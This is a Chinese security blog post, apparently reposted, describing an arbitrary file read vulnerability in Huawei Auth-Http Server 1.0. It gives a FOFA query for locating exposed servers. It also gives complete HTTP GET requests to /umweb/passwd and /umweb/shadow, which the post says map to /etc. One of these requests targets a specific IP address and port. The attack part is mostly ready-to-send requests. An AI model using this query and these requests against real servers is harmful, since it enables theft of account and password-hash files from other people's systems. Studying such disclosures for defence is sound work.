华为Auth-HTTP服务器任意文件读取漏洞

华为Auth-Http Server 1.0存在任意文件读取,攻击者可通过该漏洞读取任意文件。

1.漏洞级别

高危

2.漏洞搜索

fofa

复制代码
server="Huawei Auth-Http Server 1.0"

3.漏洞复现

构造

复制代码
GET /umweb/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

即可成功获取数据
同理,构造

复制代码
GET /umweb/shadow HTTP/1.1
Host: 60.23.25.42:8887
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

这里的umweb路径等价于/etc,后面接文件的地址

复制代码
/umweb/passwd = /etc/passwd
同理还可以访问
/umweb/shadow
/umweb/hosts等敏感文件

注:可惜的是这个漏洞无法跨越目录访问,只能在/etc目录下进行访问,因此利用价值相对有限,无法获得过多的敏感数据,属于是是个鸡肋漏洞了。

相关推荐
淮北49421 小时前
计算机网络学习(七、网络安全)
学习·计算机网络·web安全
爱隐身的官人1 天前
新后端漏洞(上)- Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
网络·安全·web安全·spel表达式注入命令执行
星马梦缘1 天前
计算机网络7 第七章 网络安全
网络·计算机网络·安全·web安全·非对称加密·对称加密
weixin_446260851 天前
探索网络安全的利器:theHarvester
安全·web安全
m0_738120721 天前
CTFshow系列——PHP特性Web97-100
开发语言·安全·web安全·php·ctfshow
Suckerbin1 天前
Basic Pentesting: 1靶场渗透
笔记·安全·web安全·网络安全
嘿嘿-g1 天前
华为IP(9)
网络·华为
安卓开发者1 天前
鸿蒙NEXT主题设置指南:应用级与页面级主题定制详解
华为·harmonyos
小楓12012 天前
Web漏洞挖掘篇(二)—信息收集
web安全·网络安全·漏洞挖掘
深盾科技2 天前
鸿蒙ABC开发中的名称混淆与反射处理策略:安全与效率的平衡
安全·华为·harmonyos